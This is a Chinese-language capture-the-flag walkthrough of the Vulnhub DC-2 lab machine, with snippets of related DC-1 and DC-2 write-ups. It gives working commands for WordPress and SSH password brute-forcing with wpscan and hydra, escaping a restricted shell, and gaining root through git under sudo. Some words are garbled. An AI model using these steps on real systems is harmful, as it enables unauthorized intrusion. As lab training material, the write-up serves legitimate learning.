滲透實戰 滲透測試實戰 DC 2 靶機入侵

2022-09-09 14:12:19 字數 2203 閱讀 2378

dc-2 靶機實戰

啟動dc-2

配置其網路為nat,檢視其mac 位址,重啟dc-2 使其網路配置生效

使用nmap 掃瞄內網網段

得到dc-2 的ip位址192.168.1.162

對其進行資訊收集

訪問其ip ,連線失敗

新增本地dns解析

再訪問該**,解析成功

cewl 工具

cewl dc-2 >pwd.dic

**目錄掃瞄

使用msf 進行**目錄掃瞄

wpscan工具

wpscan --update

apt-get install wpscan wpscan   更新

注:如果wpscan 無法使用,可以嘗試更換新的kali 虛擬機器,筆者就碰到類似的問題,安裝 kali 2020.2 之後,wpscan 啟動成功

wpscan 爆破使用者

wpscan --url dc-2 -u user.dic -p pwd.dic

flag2

192.168.1.162/wp-admin

使用jerry使用者並用我們爆破出來的密碼嘗試登入

找到flag2

他告訴我們需要另闢蹊徑,我們想到了剛開始使用nmap 掃瞄時,還掃出了ssh 埠7744

hydra 爆破ssh

hydra -l user.dic -p pwd.dic ssh: -s 7744 -o hydra.ssh -vv

檢視結果:

嘗試使用ssh 登入

ssh [email protected] -p 7744

檢視當前目錄檔案

lscat flag3.txt

發現有rbash 命令限制

flag3

繞過限制

bash_cmds[a]=/bin/sh;a

/bin/bash

export path=$path:/bin/

export path=$path:/usr/bin

flag4

切換使用者

切換jerry使用者

su jerry

輸入密碼,登入成功

我們進入到jerry 使用者的家目錄

執行命令,發現沒有許可權

final-flag

提權檢視具有root許可權的命令

sudo -l

發現git 命令具有root 許可權,但是不需要提供給root 密碼

git 提權

sudo git -p --help

強制進入互動式狀態,讓頁面緩衝區無法顯示全部資訊

!/bin/bash

Vulnhub靶機實戰 DC 2

描述 靶機dc 2共有5個flag,最終需要root許可權 才可以找到並檢視flag 環境 vmware虛擬機器軟體 1.檢視ip nmap sp 192.168.1.0 24 檢視ip nmap a 192.168.1.146 這裡我的靶機ip是146 2.瀏覽器訪問 發現無法正常訪問頁面,但在u...

Vulnhub靶機實戰(二) DC 2

開始拿flag 肯定是要先掃瞄ip了,依舊是使用nmap 只掃瞄到了80埠,瀏覽器開啟頁面來進一步收集資訊,頁面上已經說明了這是乙個wordpress站點。直接可以得到乙個flag 找不到有用資訊了,用wpscan掃瞄一下吧簡要介紹一下,wpscan是一款針對wordpress的安全掃瞄軟體 wps...

滲透練習 DC 1靶機

復現slr大哥的dc 1 靶機 dc 1 安裝 直接用瀏覽器訪問剩下的兩個ip,發現有乙個介面如上圖,即為dc 1 的ip。漏洞檢測 在msfconsole中查詢並嘗試針對drupal的工具。因為從初始介面的 powered by drupal 可以知道這個網頁是基於drupal 的cms框架。所以...